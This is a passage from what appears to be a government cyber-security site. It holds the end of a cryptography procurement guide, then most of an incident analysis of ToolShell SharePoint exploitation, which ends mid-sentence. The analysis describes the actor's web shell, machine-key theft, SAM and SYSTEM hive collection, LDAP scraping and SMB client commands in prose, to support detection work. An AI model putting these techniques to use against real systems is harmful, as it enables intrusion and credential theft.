href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a> and <a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a></li> <li>ensure these policies remain consistent with any subsequent published versions</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> <div> <h4 id="validated">2.2.3 Using validated cryptographic modules and algorithms</h4> <p>Similar to <a href="#certification">Section 2.1.3 Cryptographic certification</a> on procuring products, we recommend that only algorithms and modules that have been validated by CAVP and CMVP be used in cloud and service provider environments, respectively.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic algorithms permitted to operate must be validated by the Cryptographic Algorithm Validation Program (CAVP) with a certificate listed on the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation-search">CAVP validation list</a>.</li> <li>Cryptographic modules must be validated by the Cryptographic Module Validation Program (CMVP) with an active CMVP certification and a certificate number listed on the <a href="https://csrc.nist.gov/Projects/Cryptographic-Module-Validation-Program/Validated-Modules">CMVP-validated modules list</a>.</li> <li>Cryptographic modules must be applied and operated in accordance with the cryptographic module security policy listed on the CMVP-validated modules list, in either an approved or an allowed mode.</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> </div> </section><section><h2 class="text-info" id="terms">3 Terms and conditions</h2> <p>A vendor or contractor may already have terms and conditions they use when selling their products and services. Many of the clauses recommended in this publication may be covered using different contractual language (for example, referencing NIST publications rather than Cyber Centre publications).</p> <p>In these situations, we recommend that organizations carefully compare the recommended clauses with the ones presented by the vendor, as well as any documents that the vendor references. This will help to ensure that the product or service that your organization purchases will meet your cryptographic requirements. As with all situations, when dealing with legally binding contracts, we recommend seeking legal advice.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info" id="conclusion">4 Conclusion</h2> <p>Cryptography provides an important means to protect your organization’s IT environments, whether in the cloud or managed on premises. However, it is important to ensure that the cryptographic products that these systems use to protect your data are sufficiently strong and secure. Using products that meet the Cyber Centre’s recommendations on cryptography, including validations by CAVP and CMVP, will help provide effective data confidentiality and integrity.</p> <p>This guidance has been provided for general knowledge and guidance for any organization purchasing cryptographic products or using them in their environments. As indicated, this is not legal advice.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section></div> </div> </div> </div> </div> </article>

<article data-history-node-id="6744" about="/en/news-events/threat-detection-sharepoint-vulnerabilities" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-12"> <p>The Canadian Centre for Cyber Security (Cyber Centre) is <strong>actively tracking multiple campaigns exploiting recently disclosed critical vulnerabilities in on-premises Microsoft SharePoint servers</strong>, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771. These widespread campaigns leverage an exploit chain known as <strong>ToolShell</strong>.</p> <p>To help defenders combat attacks leveraging these vulnerabilities, the Cyber Centre has compiled a detailed analysis derived from recent investigations. This analysis outlines the <strong>full attack path</strong>, examines the <strong>evolution and use of the ToolShell exploit chain</strong>, and provides an <strong>in-depth characterization of the threat actor’s techniques</strong>, along with critical mitigation and detection guidance.</p> </div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#summary">Executive summary</a></li> <li><a href="#overview">An incident overview</a></li> <li><a href="#analysis">Analysis of the incident</a></li> <li><a href="#indicators">Indicators of compromise and recommendations</a></li> <li><a href="#tools-services">Cyber Centre tools and services</a></li> <li><a href="#acknowledgements">Acknowledgements</a></li> </ul></details></section><section><h2 class="text-info" id="summary">Executive summary</h2> <p>This technical article aims to raise awareness and describe some of the tactics, techniques, and procedures (TTPs) associated with a threat actor seen exploiting the vulnerabilities in on-premises Microsoft SharePoint servers. The Canadian Centre for Cyber Security’s (Cyber Centre) preliminary findings highlight that this threat actor initially exploited a server then used a novel technique with custom .NET payloads to gain and maintain code execution. Subsequent analysis of dozens of custom in-memory payloads provided valuable insight into the extent of the compromise and the threat actor’s intentions and activities.</p> </section><section><h2 class="text-info" id="overview">An incident overview</h2> <p>The events in the timeline below highlight the type of post-exploitation behaviour observed by the Cyber Centre. This incident demonstrates how even well-prepared teams can be affected by issues outside of their control: although the victims in this use case upheld strong security practices and took appropriate precautions, they were impacted by an unforeseeable software defect.</p> <!– Figure 1 –> <section class="panel panel-default col-md-12"><div class="panel-body"> <h3 class="text-center h5" id="fig1"><strong>Figure 1: Timeline of events associated with SharePoint vulnerabilities</strong></h3> <figure><img alt="Figure 1 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig1-e.png" /></figure><details><summary>Long description – Timeline of events associated with SharePoint vulnerabilities</summary><ul class="list-unstyled"><li><strong>Day -12:</strong> Initial access using SharePoint CVE, script execution and data exfiltration (until Day -8)</li> <li><strong>Day -8:</strong> SMB lateral movement and lateral movement to IIS servers</li> <li><strong>Day -10:</strong> SMB lateral movement (until Day -2), lateral movement to IIS servers (until Day -2), script executions (until Day -1), and data exfiltration (until Day -1)</li> <li><strong>Day 0:</strong> CVEs published (CVE-2025-53770 and CVE-2025-53771)</li> <li><strong>Day 2:</strong> Patches released</li> <li><strong>Day 9:</strong> Last known actor activity on network</li> </ul></details></div> </section><p>The Cyber Centre confirmed that activities exploiting the SharePoint vulnerabilities were observed as early as Day -12, consistent with the following recent reports:</p> <ul><li><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/">Disrupting active exploitation of on-premises SharePoint vulnerabilities (Microsoft)</a></li> <li><a href="https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/">Active Exploitation of Microsoft SharePoint Vulnerabilities: Threat Brief (Palo Alto’s Unit42)</a></li> </ul><p>However, a key indicator of compromise (IoC) shared by Microsoft in its July 19 <a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/">customer guidance for SharePoint vulnerability CVE-2025-53770</a>—the presence of a file called spinstall0.aspx—was not found during the incident in question. This demonstrates that the threat actor initially exploited the server and then used a novel technique with custom .NET payloads to gain and maintain code execution. Therefore, the spinstall0.aspx file (or variations on it) was not observed as part of the attack path, nor was a PowerShell process spawned by Internet Information Services (IIS).</p> <p>Having established an initial foothold in the network, the threat actor moved to an additional server to perform reconnaissance, solidify their access and establish persistence through discovery and lateral movement. To achieve this, they uploaded several different custom .NET payloads directly into the IIS process memory over a period of several hours. These payloads included:</p> <ul><li>a module to intercept requests for legitimate files on the web server based on certain criteria</li> <li>a module to extract cryptographic configuration values to facilitate subsequent exploitation on the web server</li> <li>a module to read and exfiltrate the host’s Security Account Manager (SAM) password database for offline cracking</li> <li>a Server Message Block (SMB) client to perform reconnaissance on the network</li> <li>a filesystem crawler</li> <li>a Lightweight Directory Access Protocol (LDAP) querying tool</li> </ul><p>These payloads were frequently combined with a privilege escalation exploit and an encryption module.</p> <!– Figure 2 –> <section class="panel panel-default col-md-8 col-md-offset-1"><div class="panel-body"> <h3 class="text-center h5" id="fig2"><strong>Figure 2: Attack path depicting how the threat actor gained access and moved through the environment</strong></h3> <figure><img alt="Figure 2 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig2-e.png" /></figure><details><summary>Long description – Attack path depicting how the threat actor gained access and moved through the environment</summary><p>The image illustrates an attack flow starting with an external threat actor exploiting a SharePoint server in the DMZ (Step 1). From the SharePoint server, the attacker collects information and performs privilege escalation (Step 2). The attacker performs account discovery from the domain controller (Step 3). The attacker moves laterally to an IIS server (Step 4). The attacker shows interest in the internal exchange server (Step 5). The attacker moves laterally into the internal network (Step 6).</p> </details></div> </section><div class="clearfix"> </div> <p>The threat actor used Hypertext Transfer Protocol Secure (HTTPS) externally to access compromised servers and exfiltrate data. They used SMB internally to perform reconnaissance and stage a new web shell on a separate IIS web server that was not running SharePoint. The threat actor leveraged compromised network devices to obfuscate their true origin and access the victims’ network from unpredictable IP addresses. This allowed them to blend in with normal traffic and reduced the usefulness of IP-based IoCs for tracking and discovery.</p> <p>From both beachheads, the threat actor proceeded to connect to multiple devices on the internal network and scrape the domain controller and LDAP servers for information.</p> <p>The last known activity on the network by the threat actor occurred on Day 9, with some subsequent reconnaissance activity touching cloud resources using previously compromised credentials. As of this writing, we continue to observe persistent malicious efforts to access both on-prem and cloud infrastructure using these credentials, which have since been rotated.</p> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <!– Section: Analysis of the incident –> <section><h2 class="text-info" id="analysis">Analysis of the incident</h2> <section class="alert alert-info"><p><strong>Disclaimer:</strong> Comments in source code were added as part of reverse-engineering efforts and are not present in the original samples.</p> </section><p>The Cyber Centre analyzed host and network activity by leveraging telemetry from its sensors. The victims also provided snapshots in time of firewall and Hypertext Transfer Protocol (HTTP) access logs, which were crucial in tracing the compromise back to its very beginning. Ultimately, it was the analysis of dozens of custom in-memory payloads that provided the full story.</p> <p>These payloads consisted of dynamic-link libraries (DLL) loaded into memory over a period of several weeks. The Cyber Centre extracted these payloads from running processes on compromised hosts after the common vulnerabilities and exposures (CVEs) were made public and reverse engineered. This provided valuable insight into the extent of the SharePoint compromise and the threat actor’s intent and activities.</p> <h3>MITRE ATT&amp;CK techniques observed during analysis</h3> <p>The information below is based on the attack path outlined in <a href="#fig2">figure 2</a>.</p> <h4 class="text-info">Observation 1</h4> <ul><li>Main techniques <ul><li>Exploit public-facing application (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>)</li> <li>Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</li> </ul></li> <li>Additional techniques <ul><li>Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</li> <li>Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 2</h4> <ul><li>Main techniques <ul><li>System information discovery (<a href="https://attack.mitre.org/techniques/T1082/">T1082</a>)</li> <li>Exploitation for privilege escalation (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>)</li> <li>OS credential dumping: security account manager (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>)</li> </ul></li> <li>Additional techniques <ul><li>Data from local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>)</li> <li>Unsecured credentials: credentials in files (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 3</h4> <ul><li>Main techniques <ul><li>Account discovery: local account (<a href="https://attack.mitre.org/techniques/T1087/001/">T1087.001</a>)</li> </ul></li> <li>Additional techniques <ul><li>Account discovery: domain account (<a href="https://attack.mitre.org/techniques/T1087/002/">T1087.002</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 4</h4> <ul><li>Main techniques <ul><li>Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>)</li> <li>Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</li> </ul></li> <li>Additional techniques <ul><li>Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</li> <li>Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 5</h4> <ul><li>Main techniques <ul><li>Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>)</li> </ul></li> </ul><h4 class="text-info">Observation 6</h4> <ul><li>Main techniques <ul><li>Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>)</li> </ul></li> <li>Additional techniques <ul><li>Valid accounts: domain accounts (<a href="https://attack.mitre.org/techniques/T1078/002/">T1078.002</a>)</li> <li>Remote services: remote desktop protocol (<a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a>)</li> </ul></li> </ul><p>Further analysis revealed that:</p> <ul><li>the initial exploitation dated back to Day -12, almost 2 weeks earlier than the CVEs’ public disclosure on July 19</li> <li>a significant number of malicious activities followed the preliminary compromise, leveraging more than 50 distinct payloads over a period of several weeks</li> <li>the threat actor had a keen interest in acquiring and exfiltrating documents on accessible file shares and used SMB protocol to access them</li> <li>many payloads were dynamically generated and contained hard-coded values such as server names and paths; some of these included occasional typos, which were fixed in subsequent uploads. These dynamically generated payloads limited the usefulness of hash-based IoCs</li> </ul><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 1 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 1: Initial access (TA0001)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exploit public-facing application (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>)</span></p> <p>The threat actor leveraged vulnerabilities to gain remote code execution (RCE) on an Internet-exposed SharePoint server (<a href="https://attack.mitre.org/techniques/T1190/">T1190</a>). Initial access occurred on Day -12, 2 weeks before the public disclosure of vulnerabilities, and was achieved through the exploitation of CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771, an exploit chain also known as ToolShell. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-53770 to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">Known Exploited Vulnerabilities Catalog</a> on July 20, followed by CVE-2025-49704 and CVE-2025-49706 on July 22.</p> </div> </div> <!–Observed technique 2 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 2: Persistence (TA0003)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</span></p> <p>The threat actor implemented custom-developed code designed to intercept and manipulate web server requests to legitimate files for tailored processing (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>). This code allowed interactions that facilitated the collection of internal system and network information and enabled the exfiltration of sensitive data from the compromised environment. Meanwhile, the chosen endpoint to stage subsequent activity allowed the threat actor to blend their traffic with normal application traffic. In the figure below, ows.js is a legitimate SharePoint file that the threat actor chose to use in an attempt to blend in and should not be considered an IoC.</p> <!– Figure 3 coding –> <h5 class="text-center" id="fig3"><strong>Figure 3: Sample of web shell request handler</strong></h5> <figure><img alt="Figure 3 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig3-e.png" /></figure><details><summary>Long description – Sample of web shell request handler</summary><p>The image contains a snippet of C# code that defines a method named OnPostAuthenticateRequestCurrent, which acts as a custom HTTP request handler. The method intercepts requests to a specific SharePoint JavaScript file (/_layouts/15/ows.js) and processes a custom header (WWW-Authorization) to potentially execute encrypted commands on the server. The code includes a conditional check to ensure the request is a GET method and that the WWW-Authorization header exists and has a length of at least 5 characters.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 3 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 3: Credential access (TA0006)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">OS credential dumping: security account manager (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>); Unsecured credentials: credentials in files (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>)</span></p> <p>The threat actor deployed custom code to gather credentials from the operating system (<a href="https://attack.mitre.org/techniques/T1003/002/">T1003.002</a>) and secure access to sensitive information located in configuration files available on the web server (<a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a>). Validation and decryption keys for the server were obtained early on, which allowed for subsequent forging of ViewState requests. As per Microsoft guidance, once the keys are compromised, patching alone is not sufficient; attackers can continue to achieve code execution through ViewState deserialization until the keys themselves are rotated and the server is restarted.</p> <!– Figure 4 coding –> <h5 class="text-center" id="fig4"><strong>Figure 4: Sample of exfiltration of cryptographic configuration settings</strong></h5> <figure><img alt="Figure 4 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig4-e.png" /></figure><details><summary>Long description – Sample of exfiltration of cryptographic configuration settings</summary><p>The image shows a C# code snippet that dynamically loads the System.Web assembly and uses reflection to access the MachineKeySection class. It retrieves sensitive configuration details such as validation and decryption keys, as well as compatibility mode, and concatenates them into a string. This information is then added to the HTTP response header under the key "X-TXT-NET," potentially exposing critical security data.</p> </details><div class="clearfix"> </div> <p>The threat actor had also gathered 4 files from the compromised server within a few days of the initial breach (listed in order of occurrence):</p> <ul><li>C:\Windows\System32\config\SAM</li> <li>C:\Windows\System32\config\SYSTEM</li> <li>C:\Windows\System32\config\SECURITY</li> <li>C:\Windows\System32\inetsrv\Config\applicationHost.config</li> </ul><p>This code snippet includes a privilege escalation exploit and a New Technology File System (NTFS) parsing library (NTFSLib) to bypass file locking by leveraging raw disk access. Access to the 4 system resources listed above allows for offline cracking of credentials.</p> <!– Figure 5 –> <h5 class="text-center" id="fig5"><strong>Figure 5: Code snippet used to collect the SYSTEM hive from disk</strong></h5> <figure><img alt="Figure 5 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig5-e.png" /></figure><details><summary>Long description – Code snippet used to collect the SYSTEM hive from disk</summary><p>The image shows a C# code snippet that processes an HTTP request if its content length is not zero. It decodes a Base64-encoded string, splits it into an array using directory separator characters, and extracts a file path. The code then interacts with a custom NTFSWrapper class to access raw disk data and retrieve the parent directory entry of the specified path, potentially indicating malicious or unauthorized file system access.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 4 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 4: Discovery (TA0007)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Account discovery: local account (<a href="https://attack.mitre.org/techniques/T1087/001/">T1087.001</a>); Account discovery: domain account (<a href="https://attack.mitre.org/techniques/T1087/002/">T1087.002</a>)</span></p> <p>Over a 2-week period, the domain controller hosting the LDAP service was queried by the threat actor 19 times to collect information on users, service accounts, groups, administrators and user mailboxes.</p> <!– Figure 6 –> <h5 class="text-center" id="fig6"><strong>Figure 6: Sample of LDAP scraping</strong></h5> <figure><img alt="Figure 6 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig6-e.png" /></figure><details><summary>Long description – Sample of LDAP scraping</summary><p>The image shows a C# code snippet that performs an LDAP query on a specified domain to search for directory entries matching a given filter. The results are serialized into JSON format, encrypted using AES with predefined keys, and then encoded in Base64 before being written to the HTTP response. This code appears to facilitate unauthorized access or exfiltration of directory information.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 5 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 5: Collection (TA0009)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Data from local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>); Email collection (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>)</span></p> <p>The threat actor leveraged their access to gather information related to the local system (<a href="https://attack.mitre.org/techniques/T1005/">T1005</a>) and unsuccessfully attempted to pivot to the internal mail server (<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>). The following data collection techniques targeted the filesystem and local storage.</p> <!– Figure 7 –> <h5 class="text-center" id="fig7"><strong>Figure 7: Sample of file collection from the local system</strong></h5> <figure><img alt="Figure 7 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig7-e.png" /></figure><details><summary>Long description – Sample of file collection from the local system</summary><p>The image shows a C# code snippet that appears to enumerate directories and files within a specified path (C:\\users\\) and collects metadata such as last write time, creation time, and file size. The gathered information is processed into a string, encrypted using AES with predefined keys, and potentially sent as part of an HTTP response. This code suggests functionality for unauthorized data collection and exfiltration.</p> </details><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <p>Of note, the actor attempted to pivot to an internal webmail server proxied through the compromised SharePoint server.</p> <!– Figure 8 –> <h5 class="text-center" id="fig8"><strong>Figure 8: Sample of email collection</strong></h5> <figure><img alt="Figure 8 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig8-e.png" /></figure><details><summary>Long description – Sample of email collection</summary><p>The image shows a C# code snippet configuring an HttpClient to send an HTTP POST request to a specified URL with custom headers and form-encoded data, including placeholders for sensitive credentials (REDACTED_USERNAME and REDACTED_PASSWORD). It sets the security protocol to support SSL3 and TLS12, bypasses SSL certificate validation, and includes a user-agent string mimicking a browser.</p> </details></div> </div> <div class="clearfix"> </div> <!–Observed technique 6 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 6: Privilege escalation (TA0004)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exploitation for privilege escalation (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>)</span></p> <p>The threat actor leveraged open-source tools to escalate their privileges and gain access to files and data beyond the reach of the initial compromise (<a href="https://attack.mitre.org/techniques/T1068/">T1068</a>). Artifacts of the <strong>PrintNotifyPotato</strong> privilege escalation tool were observed in several payloads. These allowed the threat actor access to otherwise restricted files. This technique was leveraged in multiple samples, with portions of code and strings directly matching the GitHub project source code.</p> <!– Figure 9 –> <h5 class="text-center" id="fig9"><strong>Figure 9: Sample of PrintNotifyPotato privilege escalation</strong></h5> <figure><img alt="Figure 9 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig9-e.png" /></figure><details><summary>Long description – Sample of PrintNotifyPotato privilege escalation</summary><p>The image shows a C# code snippet that performs token duplication and thread impersonation using native methods to elevate privileges. It duplicates a SYSTEM token, impersonates it on the current thread, and calls a function (F()) that appears to access sensitive data, such as the Security Account Manager (SAM) file. The code includes error handling and writes diagnostic messages to the HTTP response, indicating potential misuse for privilege escalation and data exfiltration.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 7 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 7: Lateral movement (TA0008)</h4> <p><strong>Observed techniques:</strong> <span class="label label-info">Remote services: SMB/Windows admin shares (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>); Remote services: remote desktop protocol (<a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a>)</span></p> <p>The threat actor performed reconnaissance and moved laterally in the environment by leveraging SMB connectivity (<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a>). Interestingly, they leveraged both a custom SMB client loaded inside a .NET module as well as the system’s own SMB client while they were active on the network. In addition, unsuccessful attempts to perform Remote Desktop Protocol (RDP) connections further into the network were observed from compromised servers.</p> <!– Figure 10 –> <h5 class="text-center" id="fig10"><strong>Figure 10: Sample of SMB client</strong></h5> <figure><img alt="Figure 10 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig10-e.png" /></figure><details><summary>Long description – Sample of SMB client</summary><p>The image shows a C# code snippet that processes HTTP input to extract user credentials (user, address, and password) and attempts to establish an SMB connection using these details. If the connection succeeds, it serializes and encodes the list of shared resources; otherwise, it encodes a "connection failed" message. The SMB client instance is stored in the application context, suggesting potential misuse for unauthorized access or credential harvesting.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h4>SMB commands implemented by the sample</h4> <p>In the sample above, we observed the following SMB commands and associated behaviours:</p> <ul><li><strong>cn:</strong> establishes an SMB connection using a username, password, and IP address specified in the request. It saves the SMB connection to HttpApplication.Application["817FE0AC534D44E49"]</li> <li><strong>li:</strong> lists files in the connected SMB resource</li> <li><strong>re:</strong> reads a file from the connected SMB resource</li> <li><strong>we:</strong> writes, appends or creates a file on the connected SMB resource</li> <li><strong>de:</strong> deletes a file on the connected SMB resource</li> <li><strong>di:</strong> disconnects and cleans up the SMB client</li> </ul><p>The use of a bespoke SMB client inside .NET payloads enabled further detection opportunities by looking for outgoing connections over port 445 from the IIS server process, as opposed to the normal pattern of SMB connections originating from the Windows kernel.</p> <!–Observed technique 8 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 8: Persistence (TA0003)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Server software component: web shell (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>)</span></p> <p>After gaining a foothold in the network, the threat actor pivoted to an additional Internet-exposed IIS server (not SharePoint) within a matter of days, using the lateral movement techniques previously mentioned. This helped them establish a back-up persistent access point into the network (<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>), solidifying their presence, after which they remained dormant for almost 2 weeks.</p> <p>The compromise of a non-SharePoint server emphasizes the need to look beyond initial <abbr and="" procedures="" techniques="" title="tactics,">TTPs</abbr> for signs of lateral movement once an initial compromise is detected.</p> <p>The threat actor returned briefly on Day 9 by leveraging the above-mentioned access. However, because of the Cyber Centre’s improved understanding of the actor’s <abbr and="" procedures="" techniques="" title="tactics,">TTPs</abbr>, alongside newly deployed capabilities, this new activity was quickly detected and stopped.</p> <!– Figure 11 –> <h5 class="text-center" id="fig11"><strong>Figure 11: Sample of additional web shell path</strong></h5> <figure><img alt="Figure 11 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig11-v2-e.png" /></figure><details><summary>Long description – Sample of additional web shell path</summary><p>The image shows a C# code snippet implementing an HTTP request handler that intercepts POST requests to a specific SharePoint path (/_layouts/15/start.aspx). It processes a Base64-encoded __EVENTVALIDATION parameter, decrypts it using DES, and parses the resulting data to handle specific modes, such as "Get." The code includes functionality for compressing and encoding data, suggesting potential misuse for unauthorized data manipulation or exfiltration.</p> </details></div> </div> <div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!–Observed technique 9 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 9: Resource development (TA0042)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Compromise infrastructure: network devices (<a href="https://attack.mitre.org/techniques/T1584/008/">T1584.008</a>)</span></p> <p>Indicators suggest that exploitation and exfiltration activities originated from several compromised network devices, including some with close geographical proximity to the target network. For example, the IP address used for the initial exploitation was not the same one subsequently used for ongoing collection and access development. This flexible choice of source IPs allowed the threat actor to blend in with normal traffic and reduced the usefulness of typical IP-based IoCs for tracking, discovery and blocking.</p> </div> </div> <!–Observed technique 10 –> <div class="panel panel-default"> <div class="panel-body"> <h4 class="mrgn-tp-sm">Observed tactic 10: Exfiltration (TA0010)</h4> <p><strong>Observed technique:</strong> <span class="label label-info">Exfiltration over alternative protocol: exfiltration over symmetric encrypted non-C2 protocol (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>)</span></p> <p>The Cyber Centre observed several obfuscation techniques in use during the 